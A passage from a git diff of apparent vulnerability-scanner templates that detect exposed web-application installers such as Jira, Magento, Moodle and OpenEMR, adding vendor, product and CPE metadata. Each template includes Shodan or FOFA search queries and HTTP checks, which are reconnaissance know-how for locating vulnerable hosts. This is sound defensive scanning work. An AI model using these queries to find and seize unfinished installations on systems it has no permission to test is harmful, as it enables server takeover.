4b0a00483046022100ac1631cfa08a1af2bb4a789da010263e7ba43d5c7d160a3cb8ef667ce2b53c21022100a79a9d3c3a686c50cb0b5d39deff192103bd71a98da9081f8270706802715d38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ac1631cfa08a1af2bb4a789da010263e7ba43d5c7d160a3cb8ef667ce2b53c21022100a79a9d3c3a686c50cb0b5d39deff192103bd71a98da9081f8270706802715d38:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/jira-setup.yaml b/http/misconfiguration/installer/jira-setup.yaml index 429a53ac96..cb4a6a9c2f 100644 --- a/http/misconfiguration/installer/jira-setup.yaml +++ b/http/misconfiguration/installer/jira-setup.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 2 shodan-query: title:"JIRA - JIRA setup" + product: jira + vendor: atlassian tags: misconfig,jira,atlassian,installer + classification: + cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* http: - method: GET path: @@ -34,4 +38,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202be8e9b1b4f8f254128e5963923eea49de2beb40da3453771615c5facd21c80d022100a29b9eb24be364da07e566b5b74fabcffa33d817f115c504bb3a39dc003d0931:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202be8e9b1b4f8f254128e5963923eea49de2beb40da3453771615c5facd21c80d022100a29b9eb24be364da07e566b5b74fabcffa33d817f115c504bb3a39dc003d0931:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/joomla-installer.yaml b/http/misconfiguration/installer/joomla-installer.yaml index 6880fa01a7..15691152b9 100644 --- a/http/misconfiguration/installer/joomla-installer.yaml +++ b/http/misconfiguration/installer/joomla-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"Joomla Web Installer" + product: joomla\\! + vendor: joomla tags: misconfig,joomla,install + classification: + cpe: cpe:2.3:a:joomla:joomla\\!:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206999fbe3f32c72ea8527d6ab44e0dc0e4875cc134390924bf587415690565463022100889d4fdd2020d31fc79e6b9e349d5a593d321698c00d48937a5713c2f228e208:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206999fbe3f32c72ea8527d6ab44e0dc0e4875cc134390924bf587415690565463022100889d4fdd2020d31fc79e6b9e349d5a593d321698c00d48937a5713c2f228e208:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/knowledgetree-installer.yaml b/http/misconfiguration/installer/knowledgetree-installer.yaml index dd9ec1e510..402bdcf6ec 100644 --- a/http/misconfiguration/installer/knowledgetree-installer.yaml +++ b/http/misconfiguration/installer/knowledgetree-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"KnowledgeTree Installer" + product: knowledgetree + vendor: knowledgetree tags: misconfig,knowledgetree,install,exposure + classification: + cpe: cpe:2.3:a:knowledgetree:knowledgetree:*:*:*:*:*:*:*:* http: - method: GET path: @@ -26,4 +30,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e2f1ec120a28b166e67a0f55986a6ad132ed10fbbfca68248fd8664467c77b79022026b162ddb6ef3d622c6f373261c0dd625d3af9c967c9c9969cef50dc57960c3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e2f1ec120a28b166e67a0f55986a6ad132ed10fbbfca68248fd8664467c77b79022026b162ddb6ef3d622c6f373261c0dd625d3af9c967c9c9969cef50dc57960c3d:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/kodbox-installer.yaml b/http/misconfiguration/installer/kodbox-installer.yaml index 2073873bd6..6a92bd5f19 100644 --- a/http/misconfiguration/installer/kodbox-installer.yaml +++ b/http/misconfiguration/installer/kodbox-installer.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 fofa-query: title="kodbox" && body="install" + product: kodbox + vendor: kodcloud tags: misconfig,exposure,install,kodbox + classification: + cpe: cpe:2.3:a:kodcloud:kodbox:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +36,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c07fcf62c57059aedba917e1553845d84695eeaebbfc10bf1aa17f3cc4577831022100a5f154ad42a1460a48b695348c2848636df98135009ce44c64d53bc21968eeb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c07fcf62c57059aedba917e1553845d84695eeaebbfc10bf1aa17f3cc4577831022100a5f154ad42a1460a48b695348c2848636df98135009ce44c64d53bc21968eeb0:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/librenms-installer.yaml b/http/misconfiguration/installer/librenms-installer.yaml index acc04bf806..cc6d9ec512 100644 --- a/http/misconfiguration/installer/librenms-installer.yaml +++ b/http/misconfiguration/installer/librenms-installer.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: html:"LibreNMS Install" + product: librenms + vendor: librenms tags: misconfig,install,exposure,librenms + classification: + cpe: cpe:2.3:a:librenms:librenms:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e9b5592a53be643246e6e5bee43973a44e97ff6e655d49fb6c8b4619de4823bd02205422d2733a061db4c85e518eaa773ef081286379248d0bf8e0a3b12ada08e8c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e9b5592a53be643246e6e5bee43973a44e97ff6e655d49fb6c8b4619de4823bd02205422d2733a061db4c85e518eaa773ef081286379248d0bf8e0a3b12ada08e8c6:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/limesurvey-installer.yaml b/http/misconfiguration/installer/limesurvey-installer.yaml index b879c42972..aa70fb3571 100644 --- a/http/misconfiguration/installer/limesurvey-installer.yaml +++ b/http/misconfiguration/installer/limesurvey-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: html:"Limesurvey Installer" + product: limesurvey + vendor: limesurvey tags: misconfig,limesurvey,install + classification: + cpe: cpe:2.3:a:limesurvey:limesurvey:*:*:*:*:*:*:*:* http: - method: GET path: @@ -34,4 +38,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a3e22ceb23b87ef2b520167a256c38eaa46854119b124bacbea68402cd92185002203fa3b9a8e87a25025a9980a181d9b5f66db1b7d70f1dac7b41a0aa93bc91d6be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a3e22ceb23b87ef2b520167a256c38eaa46854119b124bacbea68402cd92185002203fa3b9a8e87a25025a9980a181d9b5f66db1b7d70f1dac7b41a0aa93bc91d6be:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/lychee-installer.yaml b/http/misconfiguration/installer/lychee-installer.yaml index 99017f7357..eba6fd1171 100644 --- a/http/misconfiguration/installer/lychee-installer.yaml +++ b/http/misconfiguration/installer/lychee-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: html:"Lychee-installer" + product: lychee + vendor: lycheeorg tags: misconfig,lychee,install,exposure + classification: + cpe: cpe:2.3:a:lycheeorg:lychee:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c81139c08437b0f812c8b9ae9ef7d5d31518eb212978fd8c6eaadf5f48a302d7022067c353103dff48b164ae0f43a675e5bba61c9c3f21a88379ec53ccfaa5b4c534:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c81139c08437b0f812c8b9ae9ef7d5d31518eb212978fd8c6eaadf5f48a302d7022067c353103dff48b164ae0f43a675e5bba61c9c3f21a88379ec53ccfaa5b4c534:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/magento-installer.yaml b/http/misconfiguration/installer/magento-installer.yaml index 62de50513d..b8fecf2e4c 100644 --- a/http/misconfiguration/installer/magento-installer.yaml +++ b/http/misconfiguration/installer/magento-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: html:"Magento Installation" + product: magento + vendor: magento tags: misconfig,magento,install,exposure + classification: + cpe: cpe:2.3:a:magento:magento:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009a9f135f529c4ed779f08585c6dbae29f7df153e416a1f88023066c19a093617022024823a2e9dad1a58ebd5dda7b15771e9d6c9a504f69ec178bc765df843ecf686:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009a9f135f529c4ed779f08585c6dbae29f7df153e416a1f88023066c19a093617022024823a2e9dad1a58ebd5dda7b15771e9d6c9a504f69ec178bc765df843ecf686:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/magnolia-installer.yaml b/http/misconfiguration/installer/magnolia-installer.yaml index dd035fb9c6..25e7aec5f3 100644 --- a/http/misconfiguration/installer/magnolia-installer.yaml +++ b/http/misconfiguration/installer/magnolia-installer.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 1 shodan-query: title:"Magnolia Installation" + product: magnolia_cms + vendor: magnolia-cms tags: magnolia,exposure,installer,misconfig + classification: + cpe: cpe:2.3:a:magnolia-cms:magnolia_cms:*:*:*:*:*:*:*:* http: - method: GET path: @@ -34,4 +38,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202fe501faefe0437f5aaf50ed23236750795391092771f723589390f00fdad505022100b75940b659a50b3d784c666f81cb10925f5b16486e7bfe0848db0315105847b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202fe501faefe0437f5aaf50ed23236750795391092771f723589390f00fdad505022100b75940b659a50b3d784c666f81cb10925f5b16486e7bfe0848db0315105847b7:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/mantisbt-installer.yaml b/http/misconfiguration/installer/mantisbt-installer.yaml index 8c6527610d..302e134b69 100644 --- a/http/misconfiguration/installer/mantisbt-installer.yaml +++ b/http/misconfiguration/installer/mantisbt-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: html:"Administration - Installation - MantisBT" + product: mantisbt + vendor: mantisbt tags: misconfig,mantisbt,install,exposure + classification: + cpe: cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f03dac0390a5cb48ae9d1386bd16e63bd76795f5a5e14f08d8f097ed500ecb9702210089aa21e8714f6796a62c21441b792faa970441fbac2971677497d68a1f349247:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f03dac0390a5cb48ae9d1386bd16e63bd76795f5a5e14f08d8f097ed500ecb9702210089aa21e8714f6796a62c21441b792faa970441fbac2971677497d68a1f349247:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/matomo-installer.yaml b/http/misconfiguration/installer/matomo-installer.yaml index 8e2463353e..5ef364d080 100644 --- a/http/misconfiguration/installer/matomo-installer.yaml +++ b/http/misconfiguration/installer/matomo-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"Matomo" + product: matomo + vendor: matomo tags: misconfig,matomo,install + classification: + cpe: cpe:2.3:a:matomo:matomo:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b14569b2bb55d1039b208e26140e79f9043b67df4667d82665b409de095df398022100b7d1d2ebeae852cd6051b7bd484d183e467895d2fb5da1d8131cde177477d259:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b14569b2bb55d1039b208e26140e79f9043b67df4667d82665b409de095df398022100b7d1d2ebeae852cd6051b7bd484d183e467895d2fb5da1d8131cde177477d259:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/mautic-installer.yaml b/http/misconfiguration/installer/mautic-installer.yaml index d081e803b3..796ec33c74 100644 --- a/http/misconfiguration/installer/mautic-installer.yaml +++ b/http/misconfiguration/installer/mautic-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: html:"Mautic Installation" + product: mautic + vendor: acquia tags: misconfig,mautic,install + classification: + cpe: cpe:2.3:a:acquia:mautic:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d4bf0bd0a886c38b140b6b100f5d0e256449fd9ceede3f8d5e347624dec95ca5022100e813ce0f08d2a391ba1e198d7ba744f03a5838549b39c266520841d11c268e9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d4bf0bd0a886c38b140b6b100f5d0e256449fd9ceede3f8d5e347624dec95ca5022100e813ce0f08d2a391ba1e198d7ba744f03a5838549b39c266520841d11c268e9e:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/monstra-installer.yaml b/http/misconfiguration/installer/monstra-installer.yaml index fda92f926d..0e556c6a46 100644 --- a/http/misconfiguration/installer/monstra-installer.yaml +++ b/http/misconfiguration/installer/monstra-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: 'title:"Monstra :: Install"' + product: monstra_cms + vendor: monstra tags: misconfig,monstra,install + classification: + cpe: cpe:2.3:a:monstra:monstra_cms:*:*:*:*:*:*:*:* http: - method: GET path: @@ -26,4 +30,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bde458deeb31935fe9079daf09f7029dd803802fa2210784fbd7f3eda92be34a022100835d08ae3cf17f7f69a80f48806e60a464b1ea1fe6612b13dfd3b187e8fa5a90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bde458deeb31935fe9079daf09f7029dd803802fa2210784fbd7f3eda92be34a022100835d08ae3cf17f7f69a80f48806e60a464b1ea1fe6612b13dfd3b187e8fa5a90:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/moodle-installer.yaml b/http/misconfiguration/installer/moodle-installer.yaml index 875580b1aa..e899799053 100644 --- a/http/misconfiguration/installer/moodle-installer.yaml +++ b/http/misconfiguration/installer/moodle-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"Installation Moodle" + product: moodle + vendor: moodle tags: misconfig,moodle,install,exposure + classification: + cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a44fedbebfcd8bbc53b2b27e4ea7f86c2c49822f22286e37e36b733dc006c34c02206bf5b0618121eb3c94b05ffcd04c039458e62e48f25360aed2cf8389dbb5f116:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a44fedbebfcd8bbc53b2b27e4ea7f86c2c49822f22286e37e36b733dc006c34c02206bf5b0618121eb3c94b05ffcd04c039458e62e48f25360aed2cf8389dbb5f116:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/moosocial-installer.yaml b/http/misconfiguration/installer/moosocial-installer.yaml index 982dffe81d..e0d3ddbe88 100644 --- a/http/misconfiguration/installer/moosocial-installer.yaml +++ b/http/misconfiguration/installer/moosocial-installer.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: html:"mooSocial Installation" + product: moosocial + vendor: moosocial tags: exposure,moosocial,misconfig,install + classification: + cpe: cpe:2.3:a:moosocial:moosocial:*:*:*:*:*:*:*:* http: - method: GET path: @@ -25,4 +29,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220604d6fd4b0d42d00cb69a6de6fd9fb6be4640fc77b52f7a5cd456b70204f44ac02201a0443dafa9f1e76cfee113ecdda14756f8c86e9721abeab06b8f5ec67d2472d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220604d6fd4b0d42d00cb69a6de6fd9fb6be4640fc77b52f7a5cd456b70204f44ac02201a0443dafa9f1e76cfee113ecdda14756f8c86e9721abeab06b8f5ec67d2472d:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/mosparo-install.yaml b/http/misconfiguration/installer/mosparo-install.yaml index efec8d2b91..0e1f5107ee 100644 --- a/http/misconfiguration/installer/mosparo-install.yaml +++ b/http/misconfiguration/installer/mosparo-install.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"Setup - mosparo" + product: mosparo + vendor: mosparo tags: misconfig,mosparo,install + classification: + cpe: cpe:2.3:a:mosparo:mosparo:*:*:*:*:*:*:*:* http: - method: GET path: @@ -25,4 +29,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220471f0a3247eac57d3ceb5521de7ff051ebbf915f43d2a13d603077a1caabf0c3022040ff4e11fa185170bcac85013249ce0b2ee75cd12758d260584f2209a2d71485:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220471f0a3247eac57d3ceb5521de7ff051ebbf915f43d2a13d603077a1caabf0c3022040ff4e11fa185170bcac85013249ce0b2ee75cd12758d260584f2209a2d71485:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/mura-cms-setup-installer.yaml b/http/misconfiguration/installer/mura-cms-setup-installer.yaml index b5cf256193..abed1c9937 100644 --- a/http/misconfiguration/installer/mura-cms-setup-installer.yaml +++ b/http/misconfiguration/installer/mura-cms-setup-installer.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 fofa-query: body="Mura CMS - Setup" + product: mura_cms + vendor: murasoftware tags: misconfig,install,exposure,mura-cms + classification: + cpe: cpe:2.3:a:murasoftware:mura_cms:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202cb137965db3e399264def6e54d44679dc44d0d1cef4ffa91514a291af287439022100c78b53b7a3cf5bb8cebcdefa23b6d1c2ce8985e2b4bd5a2087920d9204b17a0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202cb137965db3e399264def6e54d44679dc44d0d1cef4ffa91514a291af287439022100c78b53b7a3cf5bb8cebcdefa23b6d1c2ce8985e2b4bd5a2087920d9204b17a0b:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/nagiosxi-installer.yaml b/http/misconfiguration/installer/nagiosxi-installer.yaml index e1655d5052..f1dcfe234f 100644 --- a/http/misconfiguration/installer/nagiosxi-installer.yaml +++ b/http/misconfiguration/installer/nagiosxi-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"Nagios XI" + product: nagios_xi + vendor: nagios tags: misconfig,exposure,install,nagiosxi + classification: + cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* http: - method: GET path: @@ -26,4 +30,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207ffb597a956ab0154f23d0293fa6926f2232bf5618ae8ab4c039c94faf389c9f02202210efaa544bbdfa046bb21db366926eb623bdd4a6987fb58c8233c08fc312f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207ffb597a956ab0154f23d0293fa6926f2232bf5618ae8ab4c039c94faf389c9f02202210efaa544bbdfa046bb21db366926eb623bdd4a6987fb58c8233c08fc312f0:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/nodebb-installer.yaml b/http/misconfiguration/installer/nodebb-installer.yaml index 02c652f9c7..7c964203db 100644 --- a/http/misconfiguration/installer/nodebb-installer.yaml +++ b/http/misconfiguration/installer/nodebb-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"NodeBB Web Installer" + product: nodebb + vendor: nodebb tags: misconfig,nodebb,install,exposure + classification: + cpe: cpe:2.3:a:nodebb:nodebb:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205dc5f44d357304e35741b0159896810ffe066e1f3a08ffabf5c32c457df7fd0f02210087ffd3229788f578be65093ee950a40935a540663bb68702c3c6218dcdd6a864:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205dc5f44d357304e35741b0159896810ffe066e1f3a08ffabf5c32c457df7fd0f02210087ffd3229788f578be65093ee950a40935a540663bb68702c3c6218dcdd6a864:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/nopcommerce-installer.yaml b/http/misconfiguration/installer/nopcommerce-installer.yaml index c4882e7d8e..6154790beb 100644 --- a/http/misconfiguration/installer/nopcommerce-installer.yaml +++ b/http/misconfiguration/installer/nopcommerce-installer.yaml @@ -11,10 +11,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H cvss-score: 9.4 cwe-id: CWE-284 + cpe: cpe:2.3:a:nopcommerce:nopcommerce:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: html:"nopCommerce Installation" + product: nopcommerce + vendor: nopcommerce tags: misconfig,nopcommerce,install http: diff --git a/http/misconfiguration/installer/octoprint-installer.yaml b/http/misconfiguration/installer/octoprint-installer.yaml index 5a90a95d62..ba84be1d13 100644 --- a/http/misconfiguration/installer/octoprint-installer.yaml +++ b/http/misconfiguration/installer/octoprint-installer.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 fofa-query: body="Thank you for installing OctoPrint" + product: octoprint + vendor: octoprint tags: install,octoprint,misconfig + classification: + cpe: cpe:2.3:a:octoprint:octoprint:*:*:*:*:*:*:*:* http: - method: GET path: @@ -27,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201afe0cd54faef3001ad0a7ff031eaefe958735bf100c5b0f1ff3c3bb837d705802210086f5f4d06e62171a2fa10da2112156e9d0f32dcd0588ad65211fa80ffa994799:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201afe0cd54faef3001ad0a7ff031eaefe958735bf100c5b0f1ff3c3bb837d705802210086f5f4d06e62171a2fa10da2112156e9d0f32dcd0588ad65211fa80ffa994799:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/ojs-installer.yaml b/http/misconfiguration/installer/ojs-installer.yaml index 6d3f4b7439..3d61f919d9 100644 --- a/http/misconfiguration/installer/ojs-installer.yaml +++ b/http/misconfiguration/installer/ojs-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 2 shodan-query: http.favicon.hash:2099342476 + product: open_journal_systems + vendor: openjournalsystems tags: misconfig,ojs,install,exposure + classification: + cpe: cpe:2.3:a:openjournalsystems:open_journal_systems:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009f6ccce9560273afe2ff39ce76b4e4763a54d111855520c5310097bad41b820e022100aa5c15214f4bb1d146046ae5597dd068d8bd5fce23b91b0790dd3dfde6361c50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009f6ccce9560273afe2ff39ce76b4e4763a54d111855520c5310097bad41b820e022100aa5c15214f4bb1d146046ae5597dd068d8bd5fce23b91b0790dd3dfde6361c50:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/onlyoffice-installer.yaml b/http/misconfiguration/installer/onlyoffice-installer.yaml index 757c6657d8..e3947628e7 100644 --- a/http/misconfiguration/installer/onlyoffice-installer.yaml +++ b/http/misconfiguration/installer/onlyoffice-installer.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: html:"Portal Setup" + product: onlyoffice + vendor: onlyoffice tags: misconfig,install,exposure,onlyoffice + classification: + cpe: cpe:2.3:a:onlyoffice:onlyoffice:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210089667df0b5585937f0f1eadad5928c4dd0ba96004a3785344b4b1e9dc07f1f80022100b7c68ecd2a2393a6e551075e175accdac85aa4ebc9673b081aff7944f5a877e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210089667df0b5585937f0f1eadad5928c4dd0ba96004a3785344b4b1e9dc07f1f80022100b7c68ecd2a2393a6e551075e175accdac85aa4ebc9673b081aff7944f5a877e4:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/openemr-setup-installer.yaml b/http/misconfiguration/installer/openemr-setup-installer.yaml index 150f54f472..acd91de701 100644 --- a/http/misconfiguration/installer/openemr-setup-installer.yaml +++ b/http/misconfiguration/installer/openemr-setup-installer.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: title:"OpenEMR Setup Tool" + product: openemr + vendor: open-emr tags: misconfig,install,exposure,openemr + classification: + cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202cf66b82cebacca9440cc78fd0922133f4e91b8e86908e5dd2b54aa7a6f278cf022100a35c14528df108de85c35e33149958f93481e5df88b51d5159a9f854c1f6fec5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202cf66b82cebacca9440cc78fd0922133f4e91b8e86908e5dd2b54aa7a6f278cf022100a35c14528df108de85c35e33149958f93481e5df88b51d5159a9f854c1f6fec5:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/openfire-setup.yaml b/http/misconfiguration/installer/openfire-setup.yaml index 7faa03f883..2b6e07d8ba 100644 --- a/http/misconfiguration/installer/openfire-setup.yaml +++ b/http/misconfiguration/installer/openfire-setup.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 shodan-query: html:"Welcome to Openfire Setup" + product: openfire + vendor: igniterealtime tags: install,openfire,exposure,misconfig + classification: + cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:* http: - method: GET path: @@ -27,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a68bc4f64b5ec3c6e043e4a1a8a390420071a630f2e8087fb59307318c89f5a0022100fb3328364ce4f7475942c690242c28b8f478a14766ae5e66aa040fc8656d5a77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a68bc4f64b5ec3c6e043e4a1a8a390420071a630f2e8087fb59307318c89f5a0022100fb3328364ce4f7475942c690242c28b8f478a14766ae5e66aa040fc8656d5a77:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/openmage-install.yaml b/http/misconfiguration/installer/openmage-install.yaml index f650b927b0..9671ef5527 100644 --- a/http/misconfiguration/installer/openmage-install.yaml +++ b/http/misconfiguration/installer/openmage-install.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"OpenMage Installation Wizard" + product: openmage + vendor: openmage tags: misconfig,openmage,install,exposure + classification: + cpe: cpe:2.3:a:openmage:openmage:*:*:*:*:*:*:*:* http: - method: GET path: @@ -26,4 +30,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e9392d09a58eccf0788321e349fa28f95a68774ef73d7a6e03076cc8f4702adc022014470f6a425d8c9053c1c0e43b06e106391c543c7789ae0e6723d7140a5e7078:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e9392d09a58eccf0788321e349fa28f95a68774ef73d7a6e03076cc8f4702adc022014470f6a425d8c9053c1c0e43b06e106391c543c7789ae0e6723d7140a5e7078:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/openshift-installer-panel.yaml b/http/misconfiguration/installer/openshift-installer-panel.yaml index 9f9bac5b5c..51be5612ab 100644 --- a/http/misconfiguration/installer/openshift-installer-panel.yaml +++ b/http/misconfiguration/installer/openshift-installer-panel.yaml @@ -9,10 +9,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L cvss-score: 4.6 cwe-id: CWE-284 + cpe: cpe:2.3:a:redhat:openshift_assisted_installer:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"OpenShift Assisted Installer" + product: openshift_assisted_installer + vendor: redhat tags: panel,openshift,cluster,misconfig http: diff --git a/http/misconfiguration/installer/opensis-installer.yaml b/http/misconfiguration/installer/opensis-installer.yaml index b896851023..1ca6a4b7c7 100644 --- a/http/misconfiguration/installer/opensis-installer.yaml +++ b/http/misconfiguration/installer/opensis-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"openSIS" + product: opensis + vendor: os4ed tags: misconfig,opensis,install,exposure + classification: + cpe: cpe:2.3:a:os4ed:opensis:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207286a677ed21cd6471387391d1d2b058872b3e2dfa2697e637563adebf3f8b660221009bacfdc9368fdeffc8a6478837f8959f05d6f8bc56065aeb59e65b6dfbee8851:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207286a677ed21cd6471387391d1d2b058872b3e2dfa2697e637563adebf3f8b660221009bacfdc9368fdeffc8a6478837f8959f05d6f8bc56065aeb59e65b6dfbee8851:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/orangehrm-installer.yaml b/http/misconfiguration/installer/orangehrm-installer.yaml index 8e8a57350a..62fa65eafb 